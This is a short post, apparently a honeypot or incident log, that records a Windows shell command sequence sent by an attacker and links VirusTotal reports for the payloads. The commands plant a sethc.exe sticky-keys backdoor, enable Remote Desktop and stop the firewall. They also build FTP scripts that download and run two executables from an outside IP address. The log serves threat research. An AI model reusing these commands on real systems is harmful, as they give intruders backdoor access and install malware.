benkow_

log shell win

Oct 16th, 2015
  1. 2015-10-16 23:33:19 - 42.96.140.141 incoming shellcommand:
  2. copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  3. copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  4. copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  5. copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  6. copy "%systemroot%\$NtServicePackUninstall$\net1.exe" "%systemroot%\system32\net1.exe"/y
  7. copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  8. copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  9. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /f
  10. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe" /f
  11. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net1.exe" /f
  12. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe" /f
  13. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /d "%systemroot%\system32\cmd.exe"
  14. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_DWORD /d "0" /f
  15. cacls %systemroot%\system32\ftp.exe /e /p system:f
  16. cacls %systemroot%\system32\net1.exe /e /p system:f
  17. cacls %systemroot%\system32\wscript.exe /e /p system:f
  18. net1 stop sharedaccess
  19. echo open 42.96.203.188>>assa2an.txt
  20. echo cesi>>assa2an.txt
  21. echo cesi>>assa2an.txt
  22. echo bin>>assa2an.txt
  23. echo get reb2967.exe>>assa2an.txt-
  24. echo bye>>assa2an.txt
  25. ftp -s:assa2an.txt
  26. reb2967.exe
  27. reb2967.exe
  28. del assa2an.txt
  29. echo open 42.96.203.188 >>sadsad.txt
  30. echo cesi>>sadsad.txt
  31. echo cesi>>sadsad.txt
  32. echo bin>>sadsad.txt
  33. echo get vip1.exe>>sadsad.txt
  34. echo bye>>sadsad.txt
  35. tvcv.exe -s:sadsad.txt
  36. vip1.exe
  37. vip1.exe
  38. del sadsad.txt
  39. cacls %systemroot%\system32\ftp.exe /e /p
  40. system:n
  41. cacls %systemroot%\system32\wscript.exe /e /p system:n
  42. exit
  43. exit
  44.  
  45.  
  46. ##########################################################################
  47. Payloads:
  48. vip1.exe - https://www.virustotal.com/fr/file/03f4dc0cace57cc3bfdccde268acfe88ba9713afe4edb915cd516fe0d43962c4/analysis/1444397185/
  49. reb2967.exe - https://www.virustotal.com/fr/file/fa1bdae4ca16f9c22842408a4f711a491a4e0cd11d0c64c8e4bd1b8e08eb8420/analysis/1444397180/